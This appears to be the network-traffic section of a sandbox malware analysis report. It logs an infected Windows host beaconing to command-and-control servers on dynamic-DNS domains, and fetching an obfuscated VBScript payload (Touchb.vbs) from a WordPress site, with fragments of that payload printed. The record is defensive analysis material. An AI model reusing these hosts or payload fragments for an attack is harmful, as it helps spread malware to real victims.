                                              May 12, 2022 14:04:24.875170946 CEST497773360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:24.908557892 CEST336049777194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:25.421931982 CEST497773360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:25.455332041 CEST336049777194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:25.968640089 CEST497773360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:26.002167940 CEST336049777194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:26.515382051 CEST497773360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:26.548993111 CEST336049777194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:26.657300949 CEST497783360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:26.880928040 CEST336049778197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:27.390204906 CEST497783360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:27.611975908 CEST336049778197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:28.124420881 CEST497783360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:28.352731943 CEST336049778197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:28.858680010 CEST497783360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:29.120646000 CEST336049778197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:29.624128103 CEST497783360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:29.846010923 CEST336049778197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:29.952919006 CEST497793360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:29.986411095 CEST336049779194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:30.498955011 CEST497793360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:30.532660961 CEST336049779194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:31.045733929 CEST497793360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:31.079072952 CEST336049779194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:31.592478037 CEST497793360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:31.625849962 CEST336049779194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:32.139157057 CEST497793360192.168.11.20194.5.98.59
                                              May 12, 2022 14:04:32.172502041 CEST336049779194.5.98.59192.168.11.20
                                              May 12, 2022 14:04:32.280458927 CEST497803360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:32.503514051 CEST336049780197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:33.013973951 CEST497803360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:33.282429934 CEST336049780197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:33.795074940 CEST497803360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:34.019216061 CEST336049780197.210.226.89192.168.11.20
                                              May 12, 2022 14:04:34.529330969 CEST497803360192.168.11.20197.210.226.89
                                              May 12, 2022 14:04:34.750971079 CEST336049780197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:03.027873039 CEST498123360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:03.061975002 CEST336049812194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:03.574542999 CEST498123360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:03.608406067 CEST336049812194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:03.716130972 CEST498133360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:04.162944078 CEST336049813197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:04.668034077 CEST498133360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:04.887828112 CEST336049813197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:05.402199984 CEST498133360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:05.618710995 CEST336049813197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:06.120831966 CEST498133360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:06.402066946 CEST336049813197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:06.917579889 CEST498133360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:07.138091087 CEST336049813197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:07.246427059 CEST498143360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:07.280356884 CEST336049814194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:07.792304993 CEST498143360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:07.826195955 CEST336049814194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:08.339071035 CEST498143360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:08.372952938 CEST336049814194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:08.885914087 CEST498143360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:08.920326948 CEST336049814194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:09.432837963 CEST498143360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:09.466869116 CEST336049814194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:09.573905945 CEST498153360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:09.785613060 CEST336049815197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:10.292004108 CEST498153360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:10.499524117 CEST336049815197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:11.010468006 CEST498153360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:11.218771935 CEST336049815197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:11.729000092 CEST498153360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:11.961261988 CEST336049815197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:12.463316917 CEST498153360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:12.794610977 CEST336049815197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:12.901566982 CEST498163360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:12.935491085 CEST336049816194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:13.447334051 CEST498163360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:13.481004953 CEST336049816194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:13.994024038 CEST498163360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:14.027776957 CEST336049816194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:14.541016102 CEST498163360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:14.575215101 CEST336049816194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:15.088036060 CEST498163360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:15.121838093 CEST336049816194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:15.228709936 CEST498173360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:16.243669033 CEST498173360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:16.466537952 CEST336049817197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:16.977765083 CEST498173360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:17.200109005 CEST336049817197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:17.712096930 CEST498173360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:18.259540081 CEST336049817197.210.226.89192.168.11.20
                                              May 12, 2022 14:06:18.774336100 CEST498173360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:24.898571968 CEST498183360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:24.932470083 CEST336049818194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:25.444726944 CEST498183360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:25.478120089 CEST336049818194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:25.991394043 CEST498183360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:26.025156021 CEST336049818194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:26.538230896 CEST498183360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:26.572247982 CEST336049818194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:27.084930897 CEST498183360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:27.118769884 CEST336049818194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:27.226138115 CEST498193360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:28.240986109 CEST498193360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:30.256200075 CEST498193360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:34.270858049 CEST498193360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:42.284876108 CEST498193360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:48.409003019 CEST498203360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:48.443049908 CEST336049820194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:48.955146074 CEST498203360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:48.989195108 CEST336049820194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:49.501794100 CEST498203360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:49.535721064 CEST336049820194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:50.048702002 CEST498203360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:50.082799911 CEST336049820194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:50.595395088 CEST498203360192.168.11.20194.5.98.59
                                              May 12, 2022 14:06:50.629441023 CEST336049820194.5.98.59192.168.11.20
                                              May 12, 2022 14:06:50.737164974 CEST498213360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:51.751347065 CEST498213360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:53.766628981 CEST498213360192.168.11.20197.210.226.89
                                              May 12, 2022 14:06:57.781194925 CEST498213360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:05.795079947 CEST498213360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:12.035223007 CEST498223360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:12.069253922 CEST336049822194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:12.575054884 CEST498223360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:12.609097958 CEST336049822194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:13.121604919 CEST498223360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:13.155191898 CEST336049822194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:13.668306112 CEST498223360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:13.701982021 CEST336049822194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:14.215267897 CEST498223360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:14.249270916 CEST336049822194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:14.368257046 CEST498233360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:15.371174097 CEST498233360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:17.370726109 CEST498233360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:21.385509968 CEST498233360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:29.399415016 CEST498233360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:35.523499012 CEST498243360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:35.556977034 CEST336049824194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:36.069673061 CEST498243360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:36.103609085 CEST336049824194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:36.616558075 CEST498243360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:36.650667906 CEST336049824194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:37.163240910 CEST498243360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:37.196950912 CEST336049824194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:37.710032940 CEST498243360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:37.744056940 CEST336049824194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:37.851560116 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:38.866192102 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:40.881197929 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:44.895946026 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:52.909796000 CEST498253360192.168.11.20197.210.226.89
                                              May 12, 2022 14:07:59.034420967 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:59.068397045 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:07:59.580203056 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:07:59.614407063 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:00.126972914 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:00.160985947 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:00.673625946 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:00.707293987 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:01.220438957 CEST498263360192.168.11.20194.5.98.59
                                              May 12, 2022 14:08:01.254221916 CEST336049826194.5.98.59192.168.11.20
                                              May 12, 2022 14:08:01.361546040 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:02.376590967 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:04.391557932 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:08.406322956 CEST498273360192.168.11.20197.210.226.89
                                              May 12, 2022 14:08:16.420222998 CEST498273360192.168.11.20197.210.226.89
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2022 14:01:30.880023956 CEST4933953192.168.11.201.1.1.1
                                              May 12, 2022 14:01:30.908416986 CEST53493391.1.1.1192.168.11.20
                                              May 12, 2022 14:01:34.561418056 CEST5839853192.168.11.201.1.1.1
                                              May 12, 2022 14:01:35.629291058 CEST5196153192.168.11.201.1.1.1
                                              May 12, 2022 14:01:36.032222033 CEST6182253192.168.11.201.1.1.1
                                              May 12, 2022 14:01:36.149482965 CEST53618221.1.1.1192.168.11.20
                                              May 12, 2022 14:01:38.475307941 CEST5130253192.168.11.201.1.1.1
                                              May 12, 2022 14:01:38.485636950 CEST53513021.1.1.1192.168.11.20
                                              May 12, 2022 14:02:46.678739071 CEST5692353192.168.11.201.1.1.1
                                              May 12, 2022 14:02:46.795648098 CEST53569231.1.1.1192.168.11.20
                                              May 12, 2022 14:02:49.115876913 CEST5514453192.168.11.201.1.1.1
                                              May 12, 2022 14:02:49.125688076 CEST53551441.1.1.1192.168.11.20
                                              May 12, 2022 14:03:49.868005037 CEST5118253192.168.11.201.1.1.1
                                              May 12, 2022 14:03:49.973295927 CEST53511821.1.1.1192.168.11.20
                                              May 12, 2022 14:03:52.289199114 CEST6105553192.168.11.201.1.1.1
                                              May 12, 2022 14:03:52.299618959 CEST53610551.1.1.1192.168.11.20
                                              May 12, 2022 14:04:52.903026104 CEST5165953192.168.11.201.1.1.1
                                              May 12, 2022 14:04:53.010270119 CEST53516591.1.1.1192.168.11.20
                                              May 12, 2022 14:04:55.339921951 CEST5018453192.168.11.201.1.1.1
                                              May 12, 2022 14:04:55.350616932 CEST53501841.1.1.1192.168.11.20
                                              May 12, 2022 14:05:55.436346054 CEST5006853192.168.11.201.1.1.1
                                              May 12, 2022 14:05:55.546958923 CEST53500681.1.1.1192.168.11.20
                                              May 12, 2022 14:05:57.872983932 CEST5243253192.168.11.201.1.1.1
                                              May 12, 2022 14:05:57.887444019 CEST53524321.1.1.1192.168.11.20
                                              May 12, 2022 14:07:11.919681072 CEST5089853192.168.11.201.1.1.1
                                              May 12, 2022 14:07:12.034357071 CEST53508981.1.1.1192.168.11.20
                                              May 12, 2022 14:07:14.356894970 CEST6515253192.168.11.201.1.1.1
                                              May 12, 2022 14:07:14.367139101 CEST53651521.1.1.1192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2022 14:01:30.880023956 CEST | 192.168.11.20 | 1.1.1.1 | 0xc6d5 | Standard query (0) | vegproworld.com | A (IP address) | IN (0x0001)
May 12, 2022 14:01:34.561418056 CEST | 192.168.11.20 | 1.1.1.1 | 0x7e5c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
May 12, 2022 14:01:35.629291058 CEST | 192.168.11.20 | 1.1.1.1 | 0xd8a7 | Standard query (0) | jgdbpa.am.files.1drv.com | A (IP address) | IN (0x0001)
May 12, 2022 14:01:36.032222033 CEST | 192.168.11.20 | 1.1.1.1 | 0x3d7c | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:01:38.475307941 CEST | 192.168.11.20 | 1.1.1.1 | 0xd396 | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
May 12, 2022 14:02:46.678739071 CEST | 192.168.11.20 | 1.1.1.1 | 0x5ae7 | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:02:49.115876913 CEST | 192.168.11.20 | 1.1.1.1 | 0xbc2c | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
May 12, 2022 14:03:49.868005037 CEST | 192.168.11.20 | 1.1.1.1 | 0x3bfb | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:03:52.289199114 CEST | 192.168.11.20 | 1.1.1.1 | 0xeb3 | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
May 12, 2022 14:04:52.903026104 CEST | 192.168.11.20 | 1.1.1.1 | 0xb312 | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:04:55.339921951 CEST | 192.168.11.20 | 1.1.1.1 | 0xc379 | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
May 12, 2022 14:05:55.436346054 CEST | 192.168.11.20 | 1.1.1.1 | 0x14a4 | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:05:57.872983932 CEST | 192.168.11.20 | 1.1.1.1 | 0x7612 | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
May 12, 2022 14:07:11.919681072 CEST | 192.168.11.20 | 1.1.1.1 | 0xfcab | Standard query (0) | toshiba1122.duckdns.org | A (IP address) | IN (0x0001)
May 12, 2022 14:07:14.356894970 CEST | 192.168.11.20 | 1.1.1.1 | 0xed5e | Standard query (0) | toshiba1122.ddns.net | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2022 14:01:30.908416986 CEST | 1.1.1.1 | 192.168.11.20 | 0xc6d5 | No error (0) | vegproworld.com | | 148.66.138.165 | A (IP address) | IN (0x0001)
May 12, 2022 14:01:34.570173025 CEST | 1.1.1.1 | 192.168.11.20 | 0x7e5c | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
May 12, 2022 14:01:34.570173025 CEST | 1.1.1.1 | 192.168.11.20 | 0x7e5c | No error (0) | l-0004.l-dc-msedge.net | | 13.107.43.13 | A (IP address) | IN (0x0001)
May 12, 2022 14:01:35.709649086 CEST | 1.1.1.1 | 192.168.11.20 | 0xd8a7 | No error (0) | jgdbpa.am.files.1drv.com | am-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2022 14:01:35.709649086 CEST | 1.1.1.1 | 192.168.11.20 | 0xd8a7 | No error (0) | am-files.fe.1drv.com | odc-am-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
May 12, 2022 14:01:36.149482965 CEST | 1.1.1.1 | 192.168.11.20 | 0x3d7c | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:01:38.485636950 CEST | 1.1.1.1 | 192.168.11.20 | 0xd396 | No error (0) | toshiba1122.ddns.net | | 197.210.226.45 | A (IP address) | IN (0x0001)
May 12, 2022 14:02:46.795648098 CEST | 1.1.1.1 | 192.168.11.20 | 0x5ae7 | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:02:49.125688076 CEST | 1.1.1.1 | 192.168.11.20 | 0xbc2c | No error (0) | toshiba1122.ddns.net | | 197.210.226.89 | A (IP address) | IN (0x0001)
May 12, 2022 14:03:49.973295927 CEST | 1.1.1.1 | 192.168.11.20 | 0x3bfb | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:03:52.299618959 CEST | 1.1.1.1 | 192.168.11.20 | 0xeb3 | No error (0) | toshiba1122.ddns.net | | 197.210.226.89 | A (IP address) | IN (0x0001)
May 12, 2022 14:04:53.010270119 CEST | 1.1.1.1 | 192.168.11.20 | 0xb312 | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:04:55.350616932 CEST | 1.1.1.1 | 192.168.11.20 | 0xc379 | No error (0) | toshiba1122.ddns.net | | 197.210.226.89 | A (IP address) | IN (0x0001)
May 12, 2022 14:05:55.546958923 CEST | 1.1.1.1 | 192.168.11.20 | 0x14a4 | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:05:57.887444019 CEST | 1.1.1.1 | 192.168.11.20 | 0x7612 | No error (0) | toshiba1122.ddns.net | | 197.210.226.89 | A (IP address) | IN (0x0001)
May 12, 2022 14:07:12.034357071 CEST | 1.1.1.1 | 192.168.11.20 | 0xfcab | No error (0) | toshiba1122.duckdns.org | | 194.5.98.59 | A (IP address) | IN (0x0001)
May 12, 2022 14:07:14.367139101 CEST | 1.1.1.1 | 192.168.11.20 | 0xed5e | No error (0) | toshiba1122.ddns.net | | 197.210.226.89 | A (IP address) | IN (0x0001)
                                              • vegproworld.com
                                              • onedrive.live.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49738 | 148.66.138.165 | 443 | C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-12 12:01:31 UTC | 0 | OUT | GET /wp-content/Touchb.vbs HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: vegproworld.com
Cache-Control: no-cache
2022-05-12 12:01:32 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Thu, 12 May 2022 12:01:31 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 10 May 2022 23:34:55 GMT
ETag: "6b0093d-3e3f5-5deb0c5a6958a"
Accept-Ranges: bytes
Content-Length: 254965
Vary: Accept-Encoding
Content-Type: text/vbscript
                                              Data Ascii: 'Superstim rukansbu DISPASS Justitsr3 FISKERIT takker SAPREMIAS Elim6 sedgese FILTRE 'Gyra unhu Forraa3 FOROMTALCH sawniere metageo Inoffenciv8 Automato REFELGULD ANAPHYLAC julepsundi okse aitch Caro3 Nounlessv4 LYDEFRIT UNSOMBRENE KERATOM OVERPOSTIN To
                                              Data Ascii: a887CMa8873CALLDCMa88C:C53CALLCALLCCMa88C:C596CALLBMa885E9C:CD9ACALL99CALLD7CALLCCMa88C:C53CALL7385Ma88Xilo225979Xilo22B79Ma88CMa883B5Ma88Xilo22Ma883A9282C:CEXilo22CALLCCMa88CMa88ECALL7585Ma88Xilo22C77DCALL8D5ACALL6C5Ma883Xilo22Ma88779Ma889833CALL6C2B69AC
                                              Data Ascii: o22AEEBE35Ma88BEC8EC:C27B886Xilo225CCB2C2C2C:C53CALL3Ma88AA235C:CC8C:C988CALLEMa887CALLEAAXilo22CA6B73CALLD9DCALL796C:C2Ma882C9Ma8889C:CA8D626Ma883Ma883C:CDEC:CA6C:C92DMa88ADEC:C7D3Xilo22Xilo22EE96CALLB789C:CC77Ma883Ma88CALLEC:CE8DMa88CC:CCE89683D8B3Ma88A
                                              Data Ascii: Ma88BMa88E5Xilo22D23Xilo229E9CALL52DD7DMa88BECALL8EC:C5CALLXilo22ACCALLMa88Xilo22CC:CMa88BD8Ma882287CALLCALL3Ma88C38CALL6C:CD32Xilo223CALL3965Ma883A3E2ECALL85C5BBA8BXilo22Ma885D2EMa885Ma88BCCXilo22C:C98E23CALLCALLCMa88C3B56C7ACALLCMa88CALLCALLCALL3C:C5BBC
                                              2022-05-12 12:01:32 UTC31INData Raw: 43 3a 43 58 69 6c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 6f 32 32 41 33 35 38 58 69 6c 6f 32 32 42 44 44 43 3a 43 42 43 4d 61 38 38 32 39 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 35 36 39 4d 61 38 38 43 43 33 36 43 45 36 44 44 43 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 41 44 42 43 35 43 3a 43 58 69 6c 6f 32 32 4d 61 38 38 37 45 45 35 43 41 4c 4c 38 36 41 44 35 36 36 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 36 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 43 44 32 32 35 58 69 6c 6f 32 32 41 43 41 4c 4c 43 43 41 4c 4c 43 58 69 6c 6f 32 32 36 43 3a 43 35 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 32 45 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 32 38 43 3a 43 36 43 41 4c 4c 33 43
                                              Data Ascii: C:CXil"funktionsk = funktionsk & "o22A358Xilo22BDDC:CBCMa8829CALLECMa88C:C5CALL38E569Ma88CC36CE6DDC3Ma88BXilo22BADBC5C:CXilo22Ma887EE5CALL86AD566Xilo22CMa88C:C56Xilo22CXilo22CD225Xilo22ACALLCCALLCXilo226C:C5Xilo22CMa88C:C5Ma882EXilo228Xilo2228C:C6CALL3C
                                              2022-05-12 12:01:32 UTC39INData Raw: 4c 4c 43 41 4c 4c 37 4d 61 38 38 41 45 33 32 44 45 41 43 3a 43 58 69 6c 6f 32 32 36 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 43 3a 43 38 4d 61 38 38 58 69 6c 6f 32 32 42 37 44 45 43 36 58 69 6c 6f 32 32 43 3a 43 42 42 58 69 6c 6f 32 32 4d 61 38 38 36 4d 61 38 38 41 43 41 4c 4c 33 38 33 43 3a 43 41 32 44 42 36 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 39 38 33 43 41 4c 4c 33 39 43 3a 43 32 35 35 42 43 41 4c 4c 44 37 41 43 42 33 44 4d 61 38 38 43 37 37 43 41 4c 4c 33 44 41 41 41 38 45 43 3a 43 45 44 43 41 4c 4c 36 45 38 38 33 4d 61 38 38 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 32 38 58 69 6c 6f 32 32 38 38 37 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 44
                                              Data Ascii: LLCALL7Ma88AE32DEAC:CXilo2269Xilo22BXilo229Xilo22C:C8Ma88Xilo22B7DEC6Xilo22C:CBBXilo22Ma886Ma88ACALL383C:CA2DB6C:C9C7C:C73CALLCALLCC:C983CALL39C:C255BCALLD7ACB3DMa88C77CALL3DAAA8EC:CEDCALL6E883Ma88Xilo223BC:CC:C9C7C:C73CALLCALLC28Xilo22887CALLCCMa8889C:CD
                                              2022-05-12 12:01:32 UTC47INData Raw: 4d 61 38 38 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 4d 61 38 38 43 32 43 58 69 6c 6f 32 32 38 33 37 37 38 37 43 41 4c 4c 37 37 43 35 43 41 4c 4c 32 58 69 6c 6f 32 32 35 43 41 4c 4c 39 44 37 37 38 4d 61 38 38 32 45 42 35 4d 61 38 38 43 3a 43 45 43 3a 43 37 42 36 32 42 4d 61 38 38 43 33 35 43 43 41 4c 4c 41 58 69 6c 6f 32 32 32 35 4d 61 38 38 41 43 41 4c 4c 43 3a 43 41 38 45 44 42 44 43 43 41 4c 4c 41 42 4d 61 38 38 43 32 44 37 45 39 43 3a 43 43 3a 43 41 43 3a 43 32 42 37 43 41 43 41 4c 4c 33 35 35 44 41 43 41 4c 4c 38 39 43 41 4c 4c 36 43 4d 61 38 38 4d 61 38 38 38 43 33 33 45 43 41 4c 4c 37 36 37 37 37 44 43 41 4c 4c 35 33 45 43 41 4c 4c 43 43 4d 61 38 38 41 44 45 42 37 33 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 44 44 42 39 35 38 4d 61 38 38
                                              Data Ascii: Ma88C:CC:C3CALLCALLCMa88C2CXilo22837787CALL77C5CALL2Xilo225CALL9D778Ma882EB5Ma88C:CEC:C7B62BMa88C35CCALLAXilo2225Ma88ACALLC:CA8EDBDCCALLABMa88C2D7E9C:CC:CAC:C2B7CACALL355DACALL89CALL6CMa88Ma888C33ECALL76777DCALL53ECALLCCMa88ADEB73CMa88C:C5CALL38DDB958Ma88
